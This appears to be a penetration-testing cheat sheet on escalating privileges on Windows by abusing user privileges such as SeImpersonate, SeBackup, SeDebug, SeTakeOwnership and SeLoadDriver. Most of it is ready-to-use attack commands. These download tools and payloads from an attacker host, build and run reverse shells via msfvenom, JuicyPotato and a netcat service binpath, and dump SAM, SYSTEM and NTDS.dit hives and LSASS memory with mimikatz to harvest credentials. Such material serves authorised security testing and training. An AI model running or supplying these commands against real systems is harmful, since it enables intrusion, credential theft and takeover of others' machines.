Windows User Privileges

SeImpersonate

These privileges are required for an attack:

SeAssignPrimaryToken: Allows a process to assign the primary token for a process. This privilege is critical for creating processes with specific user security contexts.
SeCreateToken: The SeCreateToken privilege allows a process to create new security tokens, typically used for authentication and identity representation.
SeImpersonatePrivilege: The SeImpersonatePrivilege allows a process to impersonate other users' security tokens. This privilege is crucial for operations.

Incognito (Metasploit)

With a meterpreter shell and once we confirmed that we have these privileges, we can load incognito:

load incognito

To list the tokens:

list_tokens -u

For impersonating a token:

impersonate_token "name"

For upgrading the privileges in meterpreter shell we have to migrate to other pid:

pgrep explorer

migrate id

PrintSpoofer (Only works on Windows 10 and Server 2019)

We have to upload the nc.exe and PrintSpoofer.exe files to the victim machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/nc.exe", "C:\Temp\nc.exe")

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/PrintSpoofer64.exe", "C:\Temp\PrintSpoofer64.exe")

Juicy Potato

We have to copy the .exe file to the machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/JuicyPotato.exe", "C:\Temp\JuicyPotato.exe")

Powershell

We will upload a payload for our reverse shell. For this, we create a shell.bat file:

echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://<ip>:80/Invoke-PowerShellTcp.ps1')" > shell.bat

Finally upload the file to the machine:

(New-Object System.Net.WebClient).DownloadFile("http://<ip>/shell.bat", "C:\Temp\shell.bat")

CMD

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=5555-a x64 --platform Windows -f exe -o shell.exe

And finally execute the exploit:

Powershell

./JuicyPotato.exe -l <port> -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"

CMD

.\JuicyPotato.exe -l 443 -t * -p C:\Temp\shell.exe -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"

SigmaPotato

.\Sigmapotato.exe "net user <user> <newPass>"

SeBackup and SeRestore Privilege

This privilege allows a user to read any file on the system, even those they would not normally have access to, by accessing files in "backup mode."

You can potentially exploit this by creating copies of sensitive files (like the SAM database, registry hives, or password-protected files) and then extracting credentials offline. For instance:

reg save HKLM\SECURITY security.hive
reg save HKLM\sam sam.hive
reg save HKLM\system system.hive

Dumping Hashes

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

SeBackupPrivilege Privilege Escalation (diskshadow)

Script for PowerShell Environment

In our kali, create a file.dsh which is a Distributed Shell File.

SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias foobar
create
expose %foobar% z:

Then use unix2dos to convert the encoding and spacing of the dsh file to a format that is compatible with the Windows machine, ensuring seamless execution.

unix2dos file.dsh

And upload the file to the machine

Transferring and Executing the DSH File

When it is uploaded run the file.

diskshadow /s file.dsh

Now, we can use the RoboCopy tool to copy the file from the Z Drive to the Temp Directory.

robocopy /b z:\windows\ntds . ntds.dit

## other method
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.ditExport System Registry Value

SeDebugPrivilege

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.

procdump.exe -accepteula -ma lsass.exe lsass.dmp

This is successful, and we can load this in Mimikatz using the sekurlsa::minidump command.

mimkatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

RCE

We can also leverage SeDebugPrivilege for RCE.

First, transfer this PoC script over to the target system.

SeTakeOwnership

Find a intersting file and change the ownership for reading its content. We can use the takeownWindows binary to change ownership of the file.

takeown /f '<file_path>'

For confirming the ownership we can run this command in powershell

Get-ChildItem -Path '<file_path>' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

We may still not be able to read the file and need to modify the file ACL using icacls to be able to read it.

icacls '<file_path>' /grant <user>:F

Files of Interest

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

SeLoadDriverPrivilege

sc.exe query
$services=(get-service).name | foreach {(Get-ServiceAcl $_)  | where {$_.access.IdentityReference -match 'Server Operators'}}

sc.exe config VSS binpath="C:\temp\nc64.exe -e cmd <LHOST> <LPORT>"
sc.exe stop VSS
sc.exe start VSS

Enable a Privilege

Windows does not provide a built-in command or PowerShell cmdlet to enable privileges, so we need some scripting to help us out.

Powershell Script to enable all privileges

PreviousEnumeration NextWindows Group Privileges

Last updated 3 months ago